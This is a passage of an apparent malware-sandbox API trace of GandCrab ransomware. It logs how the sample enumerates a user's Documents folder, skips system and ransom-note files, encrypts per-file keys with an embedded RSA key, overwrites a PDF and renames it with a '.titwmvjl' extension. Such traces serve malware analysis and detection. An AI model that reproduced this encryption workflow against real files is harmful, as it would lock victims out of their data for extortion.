c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0090.203] WriteFile (in: hFile=0x248, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0090.204] CloseHandle (hObject=0x248) returned 1 [0090.204] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.204] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.204] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x23, wMilliseconds=0x209)) [0090.204] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.205] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0090.205] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0090.205] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\d2ca4a09d2ca4deb61a.lock") returned 148 [0090.205] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x248 [0090.205] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.205] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.206] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\") returned 124 [0090.206] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\*" [0090.206] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x5038f8 [0090.206] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.206] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0090.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.207] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.207] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0090.207] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0090.207] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0090.207] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\d2ca4a09d2ca4deb61a.lock" [0090.207] lstrlenW (lpString=".titwmvjl") returned 9 [0090.207] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\d2ca4a09d2ca4deb61a.lock") returned 148 [0090.207] VirtualAlloc (lpAddress=0x0, dwSize=0x168, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.207] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 157 [0090.207] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\d2ca4a09d2ca4deb61a.lock") returned 148 [0090.207] lstrlenW (lpString=".lock") returned 5 [0090.207] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.207] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0090.207] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.207] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.208] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0090.208] lstrcmpW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2=".") returned 1 [0090.208] lstrcmpW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="..") returned 1 [0090.208] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\", lpString2="fOjRhg2hhyTl9f.pdf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf" [0090.208] lstrlenW (lpString=".titwmvjl") returned 9 [0090.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf") returned 142 [0090.208] VirtualAlloc (lpAddress=0x0, dwSize=0x15c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.208] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf.titwmvjl") returned 151 [0090.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf") returned 142 [0090.208] lstrlenW (lpString=".pdf") returned 4 [0090.208] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.208] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pdf ") returned 5 [0090.208] lstrcmpiW (lpString1=".pdf", lpString2=".titwmvjl") returned -1 [0090.208] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf") returned 142 [0090.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf") returned 142 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="desktop.ini") returned 1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="autorun.inf") returned 1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="ntuser.dat") returned -1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="iconcache.db") returned -1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="bootsect.bak") returned 1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="boot.ini") returned 1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="ntuser.dat.log") returned -1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="thumbs.db") returned -1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="KRAB-DECRYPT.html") returned -1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="CRAB-DECRYPT.html") returned 1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="ntldr") returned -1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="NTDETECT.COM") returned -1 [0090.209] lstrcmpiW (lpString1="fOjRhg2hhyTl9f.pdf", lpString2="Bootfont.bin") returned 1 [0090.209] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf") returned 142 [0090.209] lstrlenW (lpString=".pdf") returned 4 [0090.209] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.209] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pdf ") returned 5 [0090.209] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.209] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.210] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\fojrhg2hhytl9f.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0090.210] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.210] ReadFile (in: hFile=0x2dc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e264*=0x21c, lpOverlapped=0x0) returned 1 [0090.211] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.211] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.212] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.212] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.212] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.212] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0090.212] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.212] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.213] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.213] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.214] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.214] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.214] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.214] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0090.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.215] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.215] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.215] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.215] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.216] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.217] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503778) returned 1 [0090.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.217] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.217] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.217] GetLastError () returned 0x0 [0090.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.217] CryptDestroyKey (hKey=0x503778) returned 1 [0090.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.217] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.218] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.218] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.219] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503778) returned 1 [0090.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.219] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.219] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.219] GetLastError () returned 0x0 [0090.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.220] CryptDestroyKey (hKey=0x503778) returned 1 [0090.220] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.220] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.220] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.220] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.220] ReadFile (in: hFile=0x2dc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e264*=0x162ca, lpOverlapped=0x0) returned 1 [0090.227] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffe9d36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.227] WriteFile (in: hFile=0x2dc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x162ca, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e248*=0x162ca, lpOverlapped=0x0) returned 1 [0090.229] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.229] WriteFile (in: hFile=0x2dc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0090.230] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.234] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.234] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.234] CloseHandle (hObject=0x2dc) returned 1 [0090.235] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\fojrhg2hhytl9f.pdf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fOjRhg2hhyTl9f.pdf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\fojrhg2hhytl9f.pdf.titwmvjl"), dwFlags=0x1) returned 1 [0090.235] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.236] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0090.236] lstrcmpW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2=".") returned 1 [0090.236] lstrcmpW (lpString1="fTVPj4GiPQZC6V3o4.odt", lpString2="..") returned 1 [0090.236] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\", lpString2="fTVPj4GiPQZC6V3o4.odt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\fTVPj4GiPQZC6V3o4.odt") 